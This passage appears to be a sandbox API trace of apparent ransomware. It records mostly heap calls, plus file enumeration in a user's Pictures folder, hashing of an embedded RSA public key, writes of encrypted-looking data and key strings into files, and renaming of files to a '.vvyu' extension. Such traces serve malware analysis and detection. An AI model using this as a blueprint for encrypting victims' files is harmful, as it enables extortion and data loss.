(HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0201.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0201.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0201.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.429] GetCurrentThreadId () returned 0x66c [0201.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0201.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0201.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0201.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0201.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0201.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0201.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0201.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34d0 [0201.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0201.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0201.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0201.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0201.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0201.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0201.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0201.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3470 [0201.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0201.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0201.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0201.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0201.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0201.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3488 [0201.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0201.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0201.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0201.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3458 [0201.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0201.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea34e8 [0201.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0201.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34b8 [0201.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34a0 [0201.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3500 [0201.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34a0 | out: hHeap=0x620000) returned 1 [0201.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea34a0 [0201.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34b8 | out: hHeap=0x620000) returned 1 [0201.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0201.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0201.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0201.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3470 | out: hHeap=0x620000) returned 1 [0201.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3470 [0201.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0201.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34d0 | out: hHeap=0x620000) returned 1 [0201.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0201.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3500 | out: hHeap=0x620000) returned 1 [0201.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0201.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0201.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0201.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3470 | out: hHeap=0x620000) returned 1 [0201.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0201.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0201.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0201.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0201.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0201.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0201.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0201.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0201.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0201.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34a0 | out: hHeap=0x620000) returned 1 [0201.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34e8 | out: hHeap=0x620000) returned 1 [0201.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0201.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3488 | out: hHeap=0x620000) returned 1 [0201.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3458 | out: hHeap=0x620000) returned 1 [0201.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0201.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0201.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0201.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3440 | out: hHeap=0x620000) returned 1 [0201.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8fdb0 | out: hHeap=0x620000) returned 1 [0201.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0201.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0201.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0201.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0201.439] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0201.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0201.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0201.444] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0xe2a9, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0xe2a9, lpOverlapped=0x0) returned 1 [0201.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0201.445] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xe2ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.445] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0201.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0201.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0201.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0201.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0201.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0201.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0201.446] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0201.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0201.447] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0201.447] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0201.447] CloseHandle (hObject=0x510) returned 1 [0201.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c2f930 [0201.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x2ea6a68 [0201.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c2f930 | out: hHeap=0x620000) returned 1 [0201.449] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\9VRBBaa2E6cjsKGlie.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\iifmhh\\9vrbbaa2e6cjskglie.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\9VRBBaa2E6cjsKGlie.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\iifmhh\\9vrbbaa2e6cjskglie.gif.vvyu")) returned 1 [0201.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.450] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0201.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ca5e50 | out: hHeap=0x620000) returned 1 [0201.453] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dc0a800, ftCreationTime.dwHighDateTime=0x1d8a053, ftLastAccessTime.dwLowDateTime=0x9a87ff40, ftLastAccessTime.dwHighDateTime=0x1d8a717, ftLastWriteTime.dwLowDateTime=0x9a87ff40, ftLastWriteTime.dwHighDateTime=0x1d8a717, nFileSizeHigh=0x0, nFileSizeLow=0x17bab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ksIF.bmp", cAlternateFileName="")) returned 1 [0201.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.453] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x2ca5e50 [0201.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.453] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\ksIF.bmp") returned=".bmp" [0201.453] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\ksIF.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\iifmhh\\ksif.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0201.454] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=97195) returned 1 [0201.454] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0201.457] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x17b85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.457] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0201.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.460] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0201.460] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x17bab, lpOverlapped=0x0) returned 1 [0201.461] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0201.461] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.461] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.461] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c278) returned 1 [0201.462] CryptCreateHash (in: hProv=0x67c278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0201.462] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0201.462] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0201.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0201.462] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0201.462] GetLastError () returned 0x0 [0201.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.462] GetLastError () returned 0x0 [0201.462] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.462] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0201.462] CryptReleaseContext (hProv=0x67c278, dwFlags=0x0) returned 1 [0201.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.463] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0201.463] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0201.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.463] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0201.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x17bb0) returned 0x2ea99b0 [0201.464] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0201.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0201.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0201.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0201.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fdb0 [0201.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3440 [0201.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fdf8 [0201.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3458 [0201.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3488 [0201.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34e8 [0201.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34a0 [0201.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0201.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0201.465] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0201.465] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0201.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3488 | out: hHeap=0x620000) returned 1 [0201.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34a0 | out: hHeap=0x620000) returned 1 [0201.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34e8 | out: hHeap=0x620000) returned 1 [0201.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0201.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34e8 [0201.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0201.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea34a0 [0201.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0201.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3488 [0201.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0201.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0201.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.466] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 